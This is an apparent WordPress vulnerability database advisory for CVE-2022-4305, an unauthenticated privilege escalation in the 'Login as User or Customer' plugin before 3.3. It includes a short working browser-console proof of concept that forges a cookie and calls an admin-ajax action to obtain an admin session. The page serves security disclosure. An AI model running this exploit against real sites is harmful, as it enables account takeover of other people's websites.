Login as User or Customer < 3.3 – Unauthenticated Privilege Escalation to Admin | CVE 2022-4305 | Plugin Vulnerabilities

Description

The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as an unauthenticated user, then reload the page to be logged in as the user with ID:

document.cookie = "loginas_old_user_id=1";
fetch("/wp-admin/admin-ajax.php?action=loginas_return_admin", {
  "method": "GET",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

login-as-customer-or-user

Fixed in 3.3

References

CVE

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

David

Submitter

David

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

286d972d-7bda-455c-a226-fd9ce5f925bd

Timeline

Publicly Published

2022-12-27 (about 2 years ago)

Added

2022-12-27 (about 2 years ago)

Last Updated

2022-12-27 (about 2 years ago)

Other

Published

Title

Published

2024-10-18

Title

GERRYWORKS Post by Mail <= 1.0 - Contributor+ Privilege Escalation

Published

2019-05-31

Title

WP Live Chat Support < 8.0.33 - Missing Permission Checks on some REST API Calls

Published

2022-02-01

Title

MasterStudy LMS < 2.7.6 - Unauthenticated Admin Account Creation

Published

2024-09-30

Title

WordPress & WooCommerce Affiliate Program < 8.5.0 - Authentication Bypass to Account Takeover and Privilege Escalation

Published

2024-09-10

Title

WooCommerce Photo Reviews Premium < 1.3.14 - Authentication Bypass to Account Takeover and Privilege Escalation